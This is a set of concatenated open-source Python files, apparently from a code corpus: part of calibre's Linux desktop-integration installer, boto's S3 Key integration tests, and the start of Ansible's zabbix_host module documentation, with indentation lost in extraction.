mimetypes.discard('application/octet-stream')
def write_mimetypes(f):
f.write('MimeType=%s;\n'%';'.join(mimetypes))
from calibre.ebooks.oeb.polish.main import SUPPORTED
from calibre.ebooks.oeb.polish.import_book import IMPORTABLE
f = open('calibre-lrfviewer.desktop', 'wb')
f.write(VIEWER)
f.close()
f = open('calibre-ebook-viewer.desktop', 'wb')
f.write(EVIEWER)
write_mimetypes(f)
f = open('calibre-ebook-edit.desktop', 'wb')
f.write(ETWEAK)
mt = {guess_type('a.' + x.lower())[0] for x in (SUPPORTED|IMPORTABLE)} - {None, 'application/octet-stream'}
f.write('MimeType=%s;\n'%';'.join(mt))
f.close()
f = open('calibre-gui.desktop', 'wb')
f.write(GUI)
write_mimetypes(f)
f.close()
des = ('calibre-gui.desktop', 'calibre-lrfviewer.desktop',
'calibre-ebook-viewer.desktop', 'calibre-ebook-edit.desktop')
appdata = os.path.join(os.path.dirname(self.opts.staging_sharedir), 'appdata')
if not os.path.exists(appdata):
try:
os.mkdir(appdata)
except:
self.warning('Failed to create %s not installing appdata files' % appdata)
if os.path.exists(appdata) and not os.access(appdata, os.W_OK):
self.warning('Do not have write permissions for %s not installing appdata files' % appdata)
else:
from calibre.utils.localization import get_all_translators
translators = dict(get_all_translators())
APPDATA = get_appdata()
for x in des:
cmd = ['xdg-desktop-menu', 'install', '--noupdate', './'+x]
cc(' '.join(cmd), shell=True)
self.menu_resources.append(x)
ak = x.partition('.')[0]
if ak in APPDATA and os.access(appdata, os.W_OK):
self.appdata_resources.append(write_appdata(ak, APPDATA[ak], appdata, translators))
cc(['xdg-desktop-menu', 'forceupdate'])
MIME = P('calibre-mimetypes.xml')
self.mime_resources.append(MIME)
cc(['xdg-mime', 'install', MIME])
except Exception:
if self.opts.fatal_errors:
raise
self.task_failed('Setting up desktop integration failed')
# }}}
def option_parser():
from calibre.utils.config import OptionParser
parser = OptionParser()
parser.add_option('--make-errors-fatal', action='store_true', default=False,
dest='fatal_errors', help='If set die on errors.')
parser.add_option('--root', dest='staging_root', default='/usr',
help='Prefix under which to install files')
parser.add_option('--bindir', default=None, dest='staging_bindir',
help='Location where calibre launcher scripts were installed. Typically /usr/bin')
parser.add_option('--sharedir', default=None, dest='staging_sharedir',
help='Location where calibre resources were installed, typically /usr/share/calibre')
return parser
def options(option_parser):
parser = option_parser()
options = parser.option_list
for group in parser.option_groups:
options += group.option_list
opts = []
for opt in options:
opts.extend(opt._short_opts)
opts.extend(opt._long_opts)
return opts
def opts_and_words(name, op, words, takes_files=False):
opts = '|'.join(options(op))
words = '|'.join([w.replace("'", "\\'") for w in words])
fname = name.replace('-', '_')
return ('_'+fname+'()'+
'''
{
local cur opts
local IFS=$'|\\t'
COMPREPLY=()
cur="${COMP_WORDS[COMP_CWORD]}"
opts="%s"
words="%s"
case "${cur}" in
-* )
COMPREPLY=( $(compgen -W "${opts}" -- ${cur}) )
COMPREPLY=( $( echo ${COMPREPLY[@]} | sed 's/ /\\\\ /g' | tr '\\n' '\\t' ) )
return 0
;;
* )
COMPREPLY=( $(compgen -W "${words}" -- ${cur}) )
COMPREPLY=( $( echo ${COMPREPLY[@]} | sed 's/ /\\\\ /g' | tr '\\n' '\\t' ) )
return 0
;;
esac
}
complete -F _'''%(opts, words) + fname + ' ' + name +"\n\n").encode('utf-8')
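# Illustrative: opts_and_words('calibre-smtp', smtp_op, []) returns the text
# of a bash function _calibre_smtp() followed by its registration line:
#     complete -F _calibre_smtp calibre-smtp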
pics = {'jpg', 'jpeg', 'gif', 'png', 'bmp'}
def opts_and_exts(name, op, exts, cover_opts=('--cover',), opf_opts=(),
file_map={}):
opts = ' '.join(options(op))
exts.extend([i.upper() for i in exts])
exts='|'.join(exts)
fname = name.replace('-', '_')
spics = '|'.join(tuple(pics) + tuple(x.upper() for x in pics))
special_exts_template = '''\
%s )
_filedir %s
return 0
;;
'''
extras = []
for eopts, eexts in ((cover_opts, "${pics}"), (opf_opts, "'@(opf)'")):
for opt in eopts:
extras.append(special_exts_template%(opt, eexts))
extras = '\n'.join(extras)
return '_'+fname+'()'+\
'''
{
local cur prev opts
COMPREPLY=()
cur="${COMP_WORDS[COMP_CWORD]}"
prev="${COMP_WORDS[COMP_CWORD-1]}"
opts="%(opts)s"
pics="@(%(pics)s)"
case "${prev}" in
%(extras)s
esac
case "${cur}" in
%(extras)s
-* )
COMPREPLY=( $(compgen -W "${opts}" -- ${cur}) )
return 0
;;
* )
_filedir '@(%(exts)s)'
return 0
;;
esac
}
complete -o filenames -F _'''%dict(pics=spics,
opts=opts, extras=extras, exts=exts) + fname + ' ' + name +"\n\n"
VIEWER = '''\
[Desktop Entry]
Version=1.0
Type=Application
Name=LRF Viewer
GenericName=Viewer for LRF files
Comment=Viewer for LRF files (SONY ebook format files)
TryExec=lrfviewer
Exec=lrfviewer %f
Icon=calibre-viewer
MimeType=application/x-sony-bbeb;
Categories=Graphics;Viewer;
'''
EVIEWER = '''\
[Desktop Entry]
Version=1.0
Type=Application
Name=E-book Viewer
GenericName=Viewer for E-books
Comment=Viewer for E-books in all the major formats
TryExec=ebook-viewer
Exec=ebook-viewer --detach %f
Icon=calibre-viewer
Categories=Graphics;Viewer;
'''
ETWEAK = '''\
[Desktop Entry]
Version=1.0
Type=Application
Name=Edit E-book
GenericName=Edit E-books
Comment=Edit e-books in various formats
TryExec=ebook-edit
Exec=ebook-edit --detach %f
Icon=calibre-ebook-edit
Categories=Office;
'''
GUI = '''\
[Desktop Entry]
Version=1.0
Type=Application
Name=calibre
GenericName=E-book library management
Comment=E-book library management: Convert, view, share, catalogue all your e-books
TryExec=calibre
Exec=calibre --detach %F
Icon=calibre-gui
Categories=Office;
'''
def get_appdata():
_ = lambda x: x # Make sure the text below is not translated, but is marked for translation
return {
'calibre-gui': {
'description':(
_('calibre is the one stop solution to all your e-book needs.'),
_('You can use calibre to catalog your books, fetch metadata for them automatically, convert them from and to all the various ebook formats, send them to your e-book reader devices, read the books on your computer, edit the books in a dedicated e-book editor and even make them available over the network with the built-in content server. You can also download news and periodicals in e-book format from over a thousand different news and magazine websites.') # noqa
),
'screenshots':(
(1408, 792, 'https://lh4.googleusercontent.com/-bNE1hc_3pIc/UvHLwKPGBPI/AAAAAAAAASA/8oavs_c6xoU/w1408-h792-no/main-default.png',),
(1408, 792, 'https://lh4.googleusercontent.com/-Zu2httSKABE/UvHMYK30JJI/AAAAAAAAATg/dQTQUjBvV5s/w1408-h792-no/main-grid.png'),
(1408, 792, 'https://lh3.googleusercontent.com/-_trYUjU_BaY/UvHMYSdKhlI/AAAAAAAAATc/auPA3gyXc6o/w1408-h792-no/main-flow.png'),
),
},
'calibre-ebook-edit': {
'description':(
_('The calibre e-book editor allows you to edit the text and styles inside the book with a live preview of your changes.'),
_('It can edit books in both the EPUB and AZW3 (kindle) formats. It includes various useful tools for checking the book for errors, editing the Table of Contents, performing automated cleanups, etc.'), # noqa
),
'screenshots':(
(1408, 792, 'https://lh5.googleusercontent.com/-M2MAVc3A8e4/UvHMWqGRa8I/AAAAAAAAATA/cecQeWUYBVs/w1408-h792-no/edit-default.png',),
(1408, 792, 'https://lh4.googleusercontent.com/-WhoMxuRb34c/UvHMWqN8aGI/AAAAAAAAATI/8SDBYWXb7-8/w1408-h792-no/edit-check.png'),
(887, 575, 'https://lh6.googleusercontent.com/-KwaOwHabnBs/UvHMWidjyXI/AAAAAAAAAS8/H6xmCeLnSpk/w887-h575-no/edit-toc.png'),
),
},
'calibre-ebook-viewer': {
'description': (
_('The calibre e-book viewer allows you to read e-books in over a dozen different formats.'),
_('It has a full screen mode for distraction free reading and can display the text with multiple columns per screen.'),
),
'screenshots':(
(1408, 792, 'https://lh5.googleusercontent.com/-dzSO82BPpaE/UvHMYY5SpNI/AAAAAAAAATk/I_kF9fYWrZM/w1408-h792-no/viewer-default.png',),
(1920, 1080, 'https://lh6.googleusercontent.com/-n32Ae5RytAk/UvHMY0QD94I/AAAAAAAAATs/Zw8Yz08HIKk/w1920-h1080-no/viewer-fs.png'),
),
},
}
def write_appdata(key, entry, base, translators):
from lxml.etree import tostring
from lxml.builder import E
fpath = os.path.join(base, '%s.appdata.xml' % key)
root = E.application(
E.id(key + '.desktop', type='desktop'),
E.licence('CC0'),
E.description(),
E.url('http://calibre-ebook.com', type='homepage'),
E.screenshots(),
)
for w, h, url in entry['screenshots']:
s = E.screenshot(url, width=str(w), height=str(h))
root[-1].append(s)
root[-1][0].set('type', 'default')
for para in entry['description']:
root[2].append(E.p(para))
for lang, t in translators.iteritems():
tp = t.ugettext(para)
if tp != para:
root[2].append(E.p(tp))
root[2][-1].set('{http://www.w3.org/XML/1998/namespace}lang', lang)
with open(fpath, 'wb') as f:
f.write(tostring(root, encoding='utf-8', xml_declaration=True, pretty_print=True))
return fpath
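# The emitted appdata file has roughly this shape (illustrative values):
#     <?xml version='1.0' encoding='utf-8'?>
#     <application>
#       <id type="desktop">calibre-gui.desktop</id>
#       <licence>CC0</licence>
#       <description><p>...</p></description>
#       <url type="homepage">http://calibre-ebook.com</url>
#       <screenshots>
#         <screenshot type="default" width="1408" height="792">https://...</screenshot>
#       </screenshots>
#     </application>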
def render_img(image, dest, width=128, height=128):
from PyQt5.Qt import QImage, Qt
img = QImage(I(image)).scaled(width, height, Qt.IgnoreAspectRatio, Qt.SmoothTransformation)
img.save(dest)
def main():
p = option_parser()
opts, args = p.parse_args()
PostInstall(opts)
return 0
def cli_index_strings():
return _('Command Line Interface'), _(
'On OS X, the command line tools are inside the calibre bundle, for example,'
' if you installed calibre in :file:`/Applications` the command line tools'
' are in :file:`/Applications/calibre.app/Contents/console.app/Contents/MacOS/`.'), _(
'Documented Commands'), _('Undocumented Commands'), _(
'You can see usage for undocumented commands by executing them without arguments in a terminal.'), _(
'Change Language')
if __name__ == '__main__':
sys.exit(main())
| gpl-3.0 |
clouddocx/boto | tests/integration/s3/test_key.py | 75 | 20790 | # -*- coding: utf-8 -*-
# Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Some unit tests for S3 Key
"""
from tests.unit import unittest
import time
import boto.s3
from boto.compat import six, StringIO, urllib
from boto.s3.connection import S3Connection
from boto.s3.key import Key
from boto.exception import S3ResponseError
class S3KeyTest(unittest.TestCase):
s3 = True
def setUp(self):
self.conn = S3Connection()
self.bucket_name = 'keytest-%d' % int(time.time())
self.bucket = self.conn.create_bucket(self.bucket_name)
def tearDown(self):
for key in self.bucket:
key.delete()
self.bucket.delete()
def test_set_contents_from_file_dataloss(self):
# Create an empty stringio and write to it.
content = "abcde"
sfp = StringIO()
sfp.write(content)
# Try set_contents_from_file() without rewinding sfp
k = self.bucket.new_key("k")
try:
k.set_contents_from_file(sfp)
self.fail("forgot to rewind so should fail.")
except AttributeError:
pass
# call with rewind and check if we wrote 5 bytes
k.set_contents_from_file(sfp, rewind=True)
self.assertEqual(k.size, 5)
# check actual contents by getting it.
kn = self.bucket.new_key("k")
ks = kn.get_contents_as_string().decode('utf-8')
self.assertEqual(ks, content)
# finally, try with a 0 length string
sfp = StringIO()
k = self.bucket.new_key("k")
k.set_contents_from_file(sfp)
self.assertEqual(k.size, 0)
# check actual contents by getting it.
kn = self.bucket.new_key("k")
ks = kn.get_contents_as_string().decode('utf-8')
self.assertEqual(ks, "")
def test_set_contents_as_file(self):
content="01234567890123456789"
sfp = StringIO(content)
        # The file position of a freshly opened StringIO is 0, so
        # set_contents_from_file() should write the full content to the key.
k = self.bucket.new_key("k")
k.set_contents_from_file(sfp)
self.assertEqual(k.size, 20)
kn = self.bucket.new_key("k")
ks = kn.get_contents_as_string().decode('utf-8')
self.assertEqual(ks, content)
# set fp to 5 and set contents. this should
# set "567890123456789" to the key
sfp.seek(5)
k = self.bucket.new_key("k")
k.set_contents_from_file(sfp)
self.assertEqual(k.size, 15)
kn = self.bucket.new_key("k")
ks = kn.get_contents_as_string().decode('utf-8')
self.assertEqual(ks, content[5:])
# set fp to 5 and only set 5 bytes. this should
# write the value "56789" to the key.
sfp.seek(5)
k = self.bucket.new_key("k")
k.set_contents_from_file(sfp, size=5)
self.assertEqual(k.size, 5)
self.assertEqual(sfp.tell(), 10)
kn = self.bucket.new_key("k")
ks = kn.get_contents_as_string().decode('utf-8')
self.assertEqual(ks, content[5:10])
def test_set_contents_with_md5(self):
content="01234567890123456789"
sfp = StringIO(content)
        # The file position of a freshly opened StringIO is 0, so
        # set_contents_from_file() should write the full content to the key.
k = self.bucket.new_key("k")
good_md5 = k.compute_md5(sfp)
k.set_contents_from_file(sfp, md5=good_md5)
kn = self.bucket.new_key("k")
ks = kn.get_contents_as_string().decode('utf-8')
self.assertEqual(ks, content)
# set fp to 5 and only set 5 bytes. this should
# write the value "56789" to the key.
sfp.seek(5)
k = self.bucket.new_key("k")
good_md5 = k.compute_md5(sfp, size=5)
k.set_contents_from_file(sfp, size=5, md5=good_md5)
self.assertEqual(sfp.tell(), 10)
kn = self.bucket.new_key("k")
ks = kn.get_contents_as_string().decode('utf-8')
self.assertEqual(ks, content[5:10])
# let's try a wrong md5 by just altering it.
k = self.bucket.new_key("k")
sfp.seek(0)
hexdig, base64 = k.compute_md5(sfp)
bad_md5 = (hexdig, base64[3:])
try:
k.set_contents_from_file(sfp, md5=bad_md5)
self.fail("should fail with bad md5")
except S3ResponseError:
pass
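    # Note: compute_md5() returns a (hexdigest, base64digest) tuple and
    # restores the file position it started from, which is why the tests
    # above can hash sfp and then upload it without an extra seek(0):
    #     hexdig, b64dig = k.compute_md5(sfp)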
def test_get_contents_with_md5(self):
content="01234567890123456789"
sfp = StringIO(content)
k = self.bucket.new_key("k")
k.set_contents_from_file(sfp)
kn = self.bucket.new_key("k")
s = kn.get_contents_as_string().decode('utf-8')
self.assertEqual(kn.md5, k.md5)
self.assertEqual(s, content)
def test_file_callback(self):
def callback(wrote, total):
self.my_cb_cnt += 1
self.assertNotEqual(wrote, self.my_cb_last, "called twice with same value")
self.my_cb_last = wrote
# Zero bytes written => 1 call
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
sfp = StringIO("")
k.set_contents_from_file(sfp, cb=callback, num_cb=10)
self.assertEqual(self.my_cb_cnt, 1)
self.assertEqual(self.my_cb_last, 0)
sfp.close()
# Read back zero bytes => 1 call
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback)
self.assertEqual(self.my_cb_cnt, 1)
self.assertEqual(self.my_cb_last, 0)
content="01234567890123456789"
sfp = StringIO(content)
        # expect 2 calls due to start/finish callbacks
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.set_contents_from_file(sfp, cb=callback, num_cb=10)
self.assertEqual(self.my_cb_cnt, 2)
self.assertEqual(self.my_cb_last, 20)
# Read back all bytes => 2 calls
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback).decode('utf-8')
self.assertEqual(self.my_cb_cnt, 2)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
        # rewind sfp and try the upload again. num_cb=-1 should fire the
        # callback for every read/write, which makes 11 calls when BufferSize=2
sfp.seek(0)
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
k.set_contents_from_file(sfp, cb=callback, num_cb=-1)
self.assertEqual(self.my_cb_cnt, 11)
self.assertEqual(self.my_cb_last, 20)
# Read back all bytes => 11 calls
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback, num_cb=-1).decode('utf-8')
self.assertEqual(self.my_cb_cnt, 11)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
        # requesting at most 1 callback still yields up to 2 calls
        # (start and finish); the final call always reports 20 bytes
sfp.seek(0)
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
k.set_contents_from_file(sfp, cb=callback, num_cb=1)
self.assertTrue(self.my_cb_cnt <= 2)
self.assertEqual(self.my_cb_last, 20)
        # requesting at most 1 callback still yields up to 2 calls
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback, num_cb=1).decode('utf-8')
self.assertTrue(self.my_cb_cnt <= 2)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
# no more than 2 times
# last time always 20 bytes
sfp.seek(0)
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
k.set_contents_from_file(sfp, cb=callback, num_cb=2)
self.assertTrue(self.my_cb_cnt <= 2)
self.assertEqual(self.my_cb_last, 20)
# no more than 2 times
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback, num_cb=2).decode('utf-8')
self.assertTrue(self.my_cb_cnt <= 2)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
# no more than 3 times
# last time always 20 bytes
sfp.seek(0)
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
k.set_contents_from_file(sfp, cb=callback, num_cb=3)
self.assertTrue(self.my_cb_cnt <= 3)
self.assertEqual(self.my_cb_last, 20)
# no more than 3 times
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback, num_cb=3).decode('utf-8')
self.assertTrue(self.my_cb_cnt <= 3)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
# no more than 4 times
# last time always 20 bytes
sfp.seek(0)
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
k.set_contents_from_file(sfp, cb=callback, num_cb=4)
self.assertTrue(self.my_cb_cnt <= 4)
self.assertEqual(self.my_cb_last, 20)
# no more than 4 times
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback, num_cb=4).decode('utf-8')
self.assertTrue(self.my_cb_cnt <= 4)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
# no more than 6 times
# last time always 20 bytes
sfp.seek(0)
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
k.set_contents_from_file(sfp, cb=callback, num_cb=6)
self.assertTrue(self.my_cb_cnt <= 6)
self.assertEqual(self.my_cb_last, 20)
# no more than 6 times
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback, num_cb=6).decode('utf-8')
self.assertTrue(self.my_cb_cnt <= 6)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
# no more than 10 times
# last time always 20 bytes
sfp.seek(0)
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
k.set_contents_from_file(sfp, cb=callback, num_cb=10)
self.assertTrue(self.my_cb_cnt <= 10)
self.assertEqual(self.my_cb_last, 20)
# no more than 10 times
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback, num_cb=10).decode('utf-8')
self.assertTrue(self.my_cb_cnt <= 10)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
# no more than 1000 times
# last time always 20 bytes
sfp.seek(0)
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
k.set_contents_from_file(sfp, cb=callback, num_cb=1000)
self.assertTrue(self.my_cb_cnt <= 1000)
self.assertEqual(self.my_cb_last, 20)
# no more than 1000 times
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback, num_cb=1000).decode('utf-8')
self.assertTrue(self.my_cb_cnt <= 1000)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
def test_website_redirects(self):
self.bucket.configure_website('index.html')
key = self.bucket.new_key('redirect-key')
self.assertTrue(key.set_redirect('http://www.amazon.com/'))
self.assertEqual(key.get_redirect(), 'http://www.amazon.com/')
self.assertTrue(key.set_redirect('http://aws.amazon.com/'))
self.assertEqual(key.get_redirect(), 'http://aws.amazon.com/')
def test_website_redirect_none_configured(self):
key = self.bucket.new_key('redirect-key')
key.set_contents_from_string('')
self.assertEqual(key.get_redirect(), None)
def test_website_redirect_with_bad_value(self):
self.bucket.configure_website('index.html')
key = self.bucket.new_key('redirect-key')
with self.assertRaises(key.provider.storage_response_error):
# Must start with a / or http
key.set_redirect('ftp://ftp.example.org')
with self.assertRaises(key.provider.storage_response_error):
# Must start with a / or http
key.set_redirect('')
def test_setting_date(self):
key = self.bucket.new_key('test_date')
# This should actually set x-amz-meta-date & not fail miserably.
key.set_metadata('date', '20130524T155935Z')
key.set_contents_from_string('Some text here.')
check = self.bucket.get_key('test_date')
self.assertEqual(check.get_metadata('date'), u'20130524T155935Z')
self.assertTrue('x-amz-meta-date' in check._get_remote_metadata())
def test_header_casing(self):
key = self.bucket.new_key('test_header_case')
# Using anything but CamelCase on ``Content-Type`` or ``Content-MD5``
# used to cause a signature error (when using ``s3`` for signing).
key.set_metadata('Content-type', 'application/json')
key.set_metadata('Content-md5', 'XmUKnus7svY1frWsVskxXg==')
key.set_contents_from_string('{"abc": 123}')
check = self.bucket.get_key('test_header_case')
self.assertEqual(check.content_type, 'application/json')
def test_header_encoding(self):
key = self.bucket.new_key('test_header_encoding')
key.set_metadata('Cache-control', u'public, max-age=500')
key.set_metadata('Test-Plus', u'A plus (+)')
key.set_metadata('Content-disposition', u'filename=Schöne Zeit.txt')
key.set_metadata('Content-Encoding', 'gzip')
key.set_metadata('Content-Language', 'de')
key.set_metadata('Content-Type', 'application/pdf')
self.assertEqual(key.content_type, 'application/pdf')
key.set_metadata('X-Robots-Tag', 'all')
key.set_metadata('Expires', u'Thu, 01 Dec 1994 16:00:00 GMT')
key.set_contents_from_string('foo')
check = self.bucket.get_key('test_header_encoding')
remote_metadata = check._get_remote_metadata()
# TODO: investigate whether encoding ' ' as '%20' makes sense
self.assertEqual(check.cache_control, 'public,%20max-age=500')
self.assertEqual(remote_metadata['cache-control'], 'public,%20max-age=500')
self.assertEqual(check.get_metadata('test-plus'), 'A plus (+)')
self.assertEqual(check.content_disposition, 'filename=Sch%C3%B6ne%20Zeit.txt')
self.assertEqual(remote_metadata['content-disposition'], 'filename=Sch%C3%B6ne%20Zeit.txt')
self.assertEqual(check.content_encoding, 'gzip')
self.assertEqual(remote_metadata['content-encoding'], 'gzip')
self.assertEqual(check.content_language, 'de')
self.assertEqual(remote_metadata['content-language'], 'de')
self.assertEqual(check.content_type, 'application/pdf')
self.assertEqual(remote_metadata['content-type'], 'application/pdf')
self.assertEqual(check.x_robots_tag, 'all')
self.assertEqual(remote_metadata['x-robots-tag'], 'all')
self.assertEqual(check.expires, 'Thu,%2001%20Dec%201994%2016:00:00%20GMT')
self.assertEqual(remote_metadata['expires'], 'Thu,%2001%20Dec%201994%2016:00:00%20GMT')
expected = u'filename=Schöne Zeit.txt'
if six.PY2:
# Newer versions of python default to unicode strings, but python 2
# requires encoding to UTF-8 to compare the two properly
expected = expected.encode('utf-8')
self.assertEqual(
urllib.parse.unquote(check.content_disposition),
expected
)
def test_set_contents_with_sse_c(self):
content="01234567890123456789"
# the plain text of customer key is "01testKeyToSSEC!"
header = {
"x-amz-server-side-encryption-customer-algorithm" :
"AES256",
"x-amz-server-side-encryption-customer-key" :
"MAAxAHQAZQBzAHQASwBlAHkAVABvAFMAUwBFAEMAIQA=",
"x-amz-server-side-encryption-customer-key-MD5" :
"fUgCZDDh6bfEMuP2bN38mg=="
}
# upload and download content with AWS specified headers
k = self.bucket.new_key("testkey_for_sse_c")
k.set_contents_from_string(content, headers=header)
kn = self.bucket.new_key("testkey_for_sse_c")
ks = kn.get_contents_as_string(headers=header)
self.assertEqual(ks, content.encode('utf-8'))
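    # Sketch of how SSE-C headers can be derived from a raw 256-bit key
    # (illustrative key, not the one used above):
    #     import base64, hashlib
    #     key = b'0' * 32
    #     header = {
    #         'x-amz-server-side-encryption-customer-algorithm': 'AES256',
    #         'x-amz-server-side-encryption-customer-key':
    #             base64.b64encode(key),
    #         'x-amz-server-side-encryption-customer-key-MD5':
    #             base64.b64encode(hashlib.md5(key).digest()),
    #     }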
class S3KeySigV4Test(unittest.TestCase):
def setUp(self):
self.conn = boto.s3.connect_to_region('eu-central-1')
self.bucket_name = 'boto-sigv4-key-%d' % int(time.time())
self.bucket = self.conn.create_bucket(self.bucket_name,
location='eu-central-1')
def tearDown(self):
for key in self.bucket:
key.delete()
self.bucket.delete()
def test_put_get_with_non_string_headers_key(self):
k = Key(self.bucket)
k.key = 'foobar'
body = 'This is a test of S3'
# A content-length header will be added to this request since it
# has a body.
k.set_contents_from_string(body)
# Set a header that has an integer. This checks for a bug where
# the sigv4 signer assumes that all of the headers are strings.
headers = {'Content-Length': 0}
from_s3_key = self.bucket.get_key('foobar', headers=headers)
self.assertEqual(from_s3_key.get_contents_as_string().decode('utf-8'),
body)
class S3KeyVersionCopyTest(unittest.TestCase):
def setUp(self):
self.conn = S3Connection()
self.bucket_name = 'boto-key-version-copy-%d' % int(time.time())
self.bucket = self.conn.create_bucket(self.bucket_name)
self.bucket.configure_versioning(True)
def tearDown(self):
for key in self.bucket.list_versions():
key.delete()
self.bucket.delete()
def test_key_overwrite_and_copy(self):
first_content = "abcdefghijklm"
second_content = "nopqrstuvwxyz"
k = Key(self.bucket, 'testkey')
k.set_contents_from_string(first_content)
# Wait for S3's eventual consistency (may not be necessary)
while self.bucket.get_key('testkey') is None:
time.sleep(5)
# Get the first version_id
first_key = self.bucket.get_key('testkey')
first_version_id = first_key.version_id
# Overwrite the key
k = Key(self.bucket, 'testkey')
k.set_contents_from_string(second_content)
# Wait for eventual consistency
while True:
second_key = self.bucket.get_key('testkey')
if second_key is None or second_key.version_id == first_version_id:
time.sleep(5)
else:
break
# Copy first key (no longer the current version) to a new key
source_key = self.bucket.get_key('testkey',
version_id=first_version_id)
source_key.copy(self.bucket, 'copiedkey')
while self.bucket.get_key('copiedkey') is None:
time.sleep(5)
copied_key = self.bucket.get_key('copiedkey')
copied_key_contents = copied_key.get_contents_as_string()
self.assertEqual(first_content, copied_key_contents)
| mit |
marcosdiez/ansible-modules-extras | monitoring/zabbix_host.py | 1 | 19612 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013-2014, Epic Games, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = '''
---
module: zabbix_host
short_description: Create, update or delete Zabbix hosts
description:
- This module allows you to create, modify and delete Zabbix host entries and associated group and template data.
version_added: "2.0"
author:
- "(@cove)"
- "Tony Minfei Ding"
- "Harrison Gu (@harrisongu)"
requirements:
- "python >= 2.6"
- zabbix-api
options:
server_url:
description:
- Url of Zabbix server, with protocol (http or https).
required: true
aliases: [ "url" ]
login_user:
description:
- Zabbix user name, used to authenticate against the server.
required: true
login_password:
description:
- Zabbix user password.
required: true
host_name:
description:
- Name of the host in Zabbix.
- host_name is the unique identifier used and cannot be updated using this module.
required: true
host_groups:
description:
- List of host groups the host is part of.
required: false
link_templates:
description:
- List of templates linked to the host.
required: false
default: None
status:
description:
- Monitoring status of the host.
required: false
choices: ['enabled', 'disabled']
default: "enabled"
state:
description:
- State of the host.
- On C(present), it will create if host does not exist or update the host if the associated data is different.
- On C(absent) will remove a host if it exists.
required: false
choices: ['present', 'absent']
default: "present"
timeout:
description:
- The timeout of API request (seconds).
default: 10
proxy:
description:
- The name of the Zabbix Proxy to be used
default: None
interfaces:
description:
- List of interfaces to be created for the host (see example below).
- 'Available values are: dns, ip, main, port, type and useip.'
- Please review the interface documentation for more information on the supported properties
- 'https://www.zabbix.com/documentation/2.0/manual/appendix/api/hostinterface/definitions#host_interface'
required: false
default: []
force:
description:
- Overwrite the host configuration, even if already present
required: false
default: "yes"
choices: [ "yes", "no" ]
version_added: "2.0"
'''
EXAMPLES = '''
- name: Create a new host or update an existing host's info
local_action:
module: zabbix_host
server_url: http://monitor.example.com
login_user: username
login_password: password
host_name: ExampleHost
host_groups:
- Example group1
- Example group2
link_templates:
- Example template1
- Example template2
status: enabled
state: present
interfaces:
- type: 1
main: 1
useip: 1
ip: 10.xx.xx.xx
dns: ""
port: 10050
- type: 4
main: 1
useip: 1
ip: 10.xx.xx.xx
dns: ""
port: 12345
proxy: a.zabbix.proxy
'''
import logging
import copy
try:
